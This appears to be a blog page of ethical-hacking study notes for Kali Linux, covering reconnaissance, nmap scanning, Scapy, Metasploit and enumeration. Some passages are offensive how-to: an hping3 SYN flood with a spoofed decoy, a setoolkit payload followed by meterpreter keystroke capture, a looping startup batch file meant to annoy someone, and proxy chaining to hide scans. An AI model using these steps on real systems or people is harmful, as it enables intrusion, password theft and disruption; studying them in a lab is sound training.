Blue Flower

Let's go and learn some tips about White Hacking, interesting ah? :)

Useful extensions for your browser

Install the Firebug Lite on the Chrome browser (https://chrome.google.com/webstore/detail/firebug-lite-for-google-c/ehemiojjcpldeipjhjkepfdaohajpbdo) and see if the websites that you visit have any vulnerabilities

 

  • Metasploitable; download this VM for your testing lab from here: https://www.offensive-security.com/metasploit-unleashed/requirements/ The default logon details are:
    • msfadmin
    • mfsadmin
  • Most companies are running IPv6, which comes enable by default on Microsoft OS and most distros, and they don't even know it. Analying/Exploring a network through IPv6 is becoming popular

 

Google your "friend"

When browsing to be dodgy, use the "incognito mode" built in Chrome (while in the browser, press Crtl+Shift+N). To customise your google results use:

  • Search for "cars -honda -renault" will display results without any "honda" or "renault" strings entries
  • Search for "cars -honda "manual" will display results with a "manual" string but without any "honda" string
  • In Google.com visit Settings > Advanced Search and customise your settings in there

Explore the Google Advance Search Operators and get familiar with it: http://www.googleguide.com/print/cheatsheet.pdf

Explore www.exploit-db.com to access the Google Hacking Database (GHDB) to search for specific google searches that queries well-known vulnerabilities in databases

Visit https://www.google.com/alerts and setup your string alerts in there (for example "hack"), and you'll receive e-mail from what's happening on the web regarding your alert string. This is the best way of getting your news personalised! :)

 

 

Tools for Website recon

There are a few tools for you to gather some info of website you want to protect/target

 

Tools for Email recon (reconnaissance)

As you well know (or should know) SMTP (Simple Mail Transfer Protocol) uses POP3 tcp/110 or tcp/995 (encrypted), IMAP tcp/143 or tcp/993 (encrypted) and SMTP tcp/25. Use the below command on your Kali to connect to a SMTP server, as if you can connect you can use SMTP Commands to actually send an e-mail https://www.samlogic.net/articles/smtp-commands-reference.htm

telnet mydomain.com 25
   HELO test.com
   MAIL FROM: This email address is being protected from spambots. You need JavaScript enabled to view it.
  • smtp-user-enum ;launch in your Kali to test if the SMTP server functions as a tarpit server https://en.wikipedia.org/wiki/Tarpit_(networking) 
  • Download the official email tracker pro, then paste the header of the e-mail on the "Trace Header" button, and see the trace happening http://www.emailtrackerpro.com/

 

 

Goodies for your Kali

If you haven't got it on your Kali VM, do apt-get install httrack as well as webhttrack; this tool will download and offline copy of whichever site you like. If you are using a wintel station, you can get the binaries here: https://www.httrack.com/

Use the metagoofil tool on your Kali VM to download public files from the target website, like pdf, docs, etc, do apt-get install metagoofil if you haven't go it

metagoofil -d yourdomain.com -t pdf -l 200 -n 50 -o domainFiles -f Results.html

The above will download PDF files from "yourdomain.com" and put them on a folder caleld domainFiles

Use the whois tool on your Kali for website recon, as well as a visit to http://whois.domaintools.com/

Using you Kali VM, fireup nslookup in interactive mode and type  "set type=mx" then the target site, for a list of DNS records visit this link: https://en.wikipedia.org/wiki/List_of_DNS_record_types

Network Scanning Practices in Kali

Use zenmap for an intense GUI scanner, type this (including the O) in the command line to forcing the discovery of operating systems of a target nmap -T4 -A -v -O 192.168.1.212 ;using Zenmap you can create new profiles and select the different settings or scripts you want to use for your scan

1) Open nmap on your Kali system and issue this command to scan your local subnet:

nmap -sn 192.168.0.0/24
nmap -O 192.168.1.120
  :the above with "O" will try to search the OS of the target

Typically, you'd use a chain of encrypted proxy servers (A to B to C, etc) to launch this type of scanning so that you're not directly detected as you'd hide your source IP address

2) Open Wireshark and start capturing traffic, then issue this command to send traffic to the target host

nmap -sX 192.168.1.147

Filter the results with the IP of your Kali (e.g. "ip.addr==192.168.1.18) and you'll see the TCP flags SYN requests,  SYN ACk ,FIN and URG

3) idle Scan (stealthy) This works as follows:

  1. From you IP (.18) you sent a TCP SYN/ACK to a zombie host (not the intended target) with let's say IP .216
  2. The zombie replays to you with RST 339, which will include the Fragment ID of the zombie
  3. With this Fragment ID, we initiate a TCP SYN for the target IP .212
  4. The target obviously will respond to the zombie, but we observe the conversation to see if any ports are open

In practice this works like this:

nmap -sn 192.168.1.0/24
 ;to find out what is up
nmap -Pn -sI 192.168.1.216 192.168.1.212
 ;use the "I" for idle scan from zombie (216) to target 9212)
nmap -Pn -sI 192.168.1.216 -p50-200 --packet-trace 192.168.1.212
 ;same as above but will scan for ports 50 to 200 only, and will display the live interaction
nmap --top-ports 20 192.168.1.120
 ;it tells you the 20 first most popular ports that are likely to be opened, if you use the "-F" switch it will means the first 100 most popular ports
nmap -sS 192.168.1.0/24 -D 192.168.1.15,192.168.1.25
  ;switch -D for decoy, the above will start the scan from your Kali's IP as well as from 1.15 and 1.25, hence confusing the admin network
nmap --iflist
  ;list your net interfaces
nmap -A -T4 192.168.1.120
  ;switch -A for All

nmap scripting, ;be careful when using scripts, as they might bring down a remote device; to find out the group of scripts you have with nmap go ahead and run namp --script-help discovery ;note that the group "safe" doesn't necessarily means that those scripts are safe to run! 

nmap --script=default 192.168.1.120
nmap -sC 192.168.1.120 
  ;both scripts are the saem
nmap --script "safe or default" 192.168.1.120
  ;will run scripts in both groups 'safe' and 'default'

Telnet practices in Kali

Once you know port known-well-port (KWP) 80 is open on a computer, you can use telnet to get further info using this:

telnet 192.168.1.212 80
 ;the result "Escape character is ']'" means you are connected
GET / HTTP/1.0
 ;the GET command which show you the version of Apache/IIS running

The command nc (for ncap) would do the same as Telnet

Scapy

Based in python, scapy is a packet manipulation tool that allows you to capture, create, play and reply any type of packages that you need, craft your own packet-chap and let it ask the target server until you find a vulnerability. There so many possibilities with Scapy, such a powerful tool it is, and to take the most of it you need to learn Python, but here there are some commands:

Declare your variables in Scapy
>>> L2=Ether()
>>> L3=IP()
>>> L4=TCP()

To see the Scapy default values for Ether, IP and TCP use:
>>> L2.show()
>>> L4.show()

Set the L3 variable to your specified values
>>> L3=IP(ttl=99, dst="192.168.1.120")

>>> SEND=SENDP(L2/L3/L4) ;this will send the packet
>>> sniff(iface="eth0", prn=lambda x:x.show()) ;sniff the traffic in your kali
>>> sniff(filet="host 192.168.1.1220", count=5)

Hping3 ;if icmp are blocked, you can use hping3 ;this program is also make in python you can interact with it by entering hping3 (Crtl+D to exit)

hping3 -S www.mysite.com -p 80 -c 5
  ;send TCP Sync to port 8 for count of 5 times, the result is similar to ping but no ICMP packets involved :)
hping3 -1 192.168.1.x --rand-dest -I eth0
hping3 -8 50-56 -S www.mydomain.com
hping3 -S 192.168.1.1 -a 192.168.1.23 -p 22 --flood
  ;the above flood the ssh port for device .1 (router) using the decoy at .23
  ;if this attack is run over a Cisco device, use to verify:
       "show control-panel host open-ports" 
       "show processes cpu sorted"

hping3 -S www.domain.com -p 80 -T --ttl 13 --tr-keep-ttl -n

The above uses -T (for traceroute), with no name resolution (-n) for hope 13 only and keep it looping, see if hope 13 changes its IP address, meaning that is part of a load balancer or not 

Vulnerability Scanner

Go and get the free version of Nessus from Tenable and install it on your Kali  https://www.tenable.com/downloads/nessus ; you'd be able to scan up to 16 IP addresses for vulnerabilities free of charge

Download a 15-day trial of SolarWinds Network Topology Mapper (NPM) to have a better inside of how the systems are interconnected https://www.solarwinds.com/network-topology-mapper  Just note that Xen Map (in your Kali, called ZenMap) can also create a topology map for you free of charge :)

IPv6 in Kali

If not configured, add an IPv6 address  ifconfig eth0 add 2001:ab8:1783:1::2/64

Metasploit

This great tool can be used for many things, let's explore a few. To open it go to Applications > Exploitations Tools > Metasploit

search snmp  ;see what available in regards to snmp
use auxiliary/scanner/snmp/snmp_enum  ;config metasploit to use this module
show options ;shows you the module settings you're using
set RHOSTS 192.168.1.120   ;sets the variable RHOSTS to the target IP address
run  ;sent the "attack"

 

ntpdate ;get it on your Kali to launch queries against targets using udp/123 for NTP

apt-get install ntpdate

setoolkit ;use it to create payloads and trojan, launch it in your Kali and use option 1 (Social Engineering Attack) > 9 (Powershell Attack Vectors) > 1 (Powershell Alphanumeric Shellcode Injector) to create a .bat file that you can run on a Windows test computer to infect it. Once the machine is infected open metasploit an use these commands:

To use in metasploit
 show sessions  ;shows infected PCs reporting to Kali
 sessions -i 10 ;interacts with session 10
 meterpreter> help ;type help for a suite of handy commands
 meterpreter> keyscan_start ;start scanning for key strokes in the affected machine
 meterpreter> keyscan_dump  ;shows you the keys -passwords- that have been entered

Goodies for your Windows OS

Download ID Server from here https://www.grc.com/id/idserve.htmv to find out what type of webserver (IIS, apache, etc) a particular site is running

NetBios suffixes

Using nmap -O you can discover whether a target has port tcp/139 netbios-ssn open, if it does you can use the nbtstat command within Windows OS to discover the mac address of the target machine, together with the Netbios suffixes, that will help you identify which services the remote target Windows OS is running http://www.pyeung.com/pages/microsoft/winnt/netbioscodes.html 

nbtstat -A 192.168.1.120
net view \\192.168.1.120

Download the nbtenum (netbios enumeration) binary from here: http://nbtenum.sourceforge.net/ and go ahead and scan your subnet

SNMP Enumeration

Get it in your head: SNMP versions 1 and 2 are insecure as they always send the password in clear text, so just by sniffing the traffic you'd be able to know the community password. Switch to v3 right now and stop using ACLs to "protect" v1/2, they traffic is never encrypted unlike version 3 which is encrypted.

Download the snmputil.exe tool from here: http://dennisbareis.com/scriptingtipsandtricks/snmputil_exe.htm and see here how Microsoft advise you to use it: https://support.microsoft.com/en-hk/help/323340/how-to-use-the-snmputil-exe-tool-to-verify-the-microsoft-snmp-agent-co 

Another good one is SNScan from Foundstone (now McAfee), search the web and "download" from a bay like and old pirate it if you can find it, be careful though and ensure you don't drink too much rum! :) http://learningpcs.blogspot.com/2010/09/utility-snscan.html 

Solarwinds can also do the same job of scanning SNMP devices on your network

jexplorer ;for LDAP enumeration against an AD udp/389, download this tool http://jxplorer.org/ and logon to the target domain with a simple user account, you'll see that all of the OUs and Accounts in the target domain are populated in the search result

Get "Sigverrif FCIV" to check file and system integrity; on Windows 10 you can run sfc /scannow (sfc = System File Checker)

Process Monitor and Registry utilities

Download process monitor and other chaps from here: https://docs.microsoft.com/en-us/sysinternals/downloads/process-utilities  

Download the jv16 Power Tools from here: https://www.macecraft.com/download/  

Download Driver View from here: https://www.nirsoft.net/utils/driverview.html

Download Windows Service Manager from sysprogs from here: http://sysprogs.com/legacy/tools/srvman/ 

Download Security Autorun from http://tcpmonitor.altervista.org ,you can check your register and startup item for malicious entries 

 

 

 

 

EC-Council

With the resources at EC-Council, either create your own lab (recommended, using VMware Workstation) or use the https://ilabs.eccouncil.org/ 

 

Theory

InfoSec concepts of security in regards to the data are Confidentiality, Integrity and Availability (C.I.A.)

APT (Advanced Persistent Threats), are very sophisticated form of code like the Stuxnet Worm

There are 5 basic phases in hacking:

  1. Reconnaissance; gathering information about the target before the attack. It could be passive reconnaissance if you google the company, research it, etc, while active reconnaissance is when you make calls to gather info, infiltrate in physically as a visitor to see their systems, etc
  2. Scanning; vulnerability and port scanning to gather more technical information about their devices
  3. Gaining Access; once you're in on a device, try to escalate your privileges to get additional access
    1. Escalating privileges; the step to raise your access higher
  4. Maintaining the Access ;ensure you have the same access when you return, this can be achieved by a rootkit, trojan, backdoor installation, etc
    1. Executing Applications ;that's the whole idea behind the hacking anyway
  5. Clearing Tracks; clear logs, activities and events that may disclose that you were on the network
    1. Hiding Files, of course delete

Steganography ;the process of hidden your message within another message

Getting information from a user is a lot easier than breaking into a system

Trojan ;a piece of software installed on a computer that check for a specific patter, like "credit card", and send the details to a hacker using http, ftp or other protocols. With HTTP RAT (Remote Access Tool) you can actually create an executable that will install the other executable (trojan) that you like, in this case the "http rat" that will list the whole of your pc under http://yourIPaddress, scary how easy it is!

 , 

Proxy changing; the process by which hackers connect 1,2,3,4, or more proxies to hide its real source IP address in an attack. On your Windows lab machine install Proxy Workbench, if you can't find it see similar sites here: https://en.freedownloadmanager.org/Windows-PC/Proxy-Workbench.html#related

Also on your lab, download Proxy Switcher from here: https://proxyswitcher.com/  and use it to hide your IP address, worth paying for this application just to browse the web in total anonymity. Remember! Do all this stuff only in your lab-controlled-by-you-only environment!

Shellshock ;a vulnerability found in 2014 in Linux servers running Apache with CGI (Common Gateway Interface), this is a bug in the bash shell that allows remote code to be executed 

bash --version  ;discover what bash version you're running
nmap -sV -p- --script http-shellshock 192.168.1.120
  ;the above will attack the .120 in search of the Shellshock vulnerability

 

Miscellaneous

Backtrack is the name Kali used to have back in 2013 https://www.backtrack-linux.org/

To annoy somebody's computer, created this batch file (.bat) and place it on the start up items, it will loop endlessly! 

@echo off
:LoopStart
start
start www.google.com
goto :LoopStart

Try to use "TeraBIT Virus Maker" to test a create a virus, but we careful to download a free-virus version!

https://www.hackthissite.org/

 

www.anywho.com

www.netcraft.com ;use Monster for an insight of the network system if the company if hiring for someone

www.kali.org to get the good guy for WMware workstation 

Google Hacking Database can be explored at www.exploit-db.com

Print Friendly, PDF & Email

Comments powered by CComment